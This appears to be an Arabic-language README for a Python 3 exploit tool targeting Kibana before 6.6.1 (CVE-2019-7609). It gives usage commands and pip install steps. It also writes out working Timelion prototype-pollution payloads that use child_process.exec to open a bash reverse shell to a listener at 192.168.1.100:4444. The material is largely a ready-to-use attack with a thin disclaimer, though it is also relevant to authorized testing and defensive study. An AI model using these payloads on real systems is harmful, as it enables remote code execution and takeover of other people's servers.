
# استغلال Python 3 لـ Kibana < 6.6.1 RCE (CVE-2019-7609) عبر تلوث النموذج الأولي، مع كشف تلقائي للإصدار وقشرة عكسية اختيارية.
المؤلف: LandGrey (إعادة هيكلة Python3 بواسطة [اسمك])
المرجع: مدخل Exploit-DB 46651
CVE: CVE-2019-7609
⚠️ إخلاء مسؤولية:
هذا النص البرمجي مخصص لأغراض تعليمية واختبارات الاختراق المصرح بها فقط. لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف والمساهمون غير مسؤولين عن أي استخدام خاطئ أو ضرر ناتج عن هذه الأداة.
هذا نص برمجي استغلال بلغة Python 3 لـ ثغرة تنفيذ الأوامر عن بعد في إصدارات Kibana < 6.6.1. يستغل عيبًا في تلوث النموذج الأولي (prototype pollution) لتنفيذ أوامر عشوائية، بما في ذلك إطلاق شل عكسي، على مثيل Kibana ضعيف.
python3 kibana_exploit.py -u http://target-kibana:5601
لإطلاق شل عكسي:
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requestspackagingقم بتثبيت التبعيات باستخدام:
pip install requests packaging
يمكنك أيضًا استغلال هذه الثغرة يدويًا باستخدام أداة التصور Timelion في Kibana:
الحمولة بواسطة securityMB:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
الحمولة بواسطة chybeta:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
استبدل 192.168.1.100 و 4444 بعنوان IP ومنفذ المستمع الخاص بك.
يوفر النص البرمجي مخرجات واضحة خطوة بخطوة للكشف والتحقق والاستغلال، مما يجعله سهل المتابعة وممتعًا في الاستخدام!
هذا النص البرمجي وسيلة رائعة لتعلم تلوث النموذج الأولي، تنفيذ الأوامر عن بعد، وتقنيات اختبار الاختراق. استخدمه بمسؤولية، ودائمًا بإذن!
هذا المشروع مخصص للاستخدام التعليمي فقط. لا يوجد ضمان، ولا ضمانات. اخترق بأخلاق، وابق فضوليًا، واستمتع!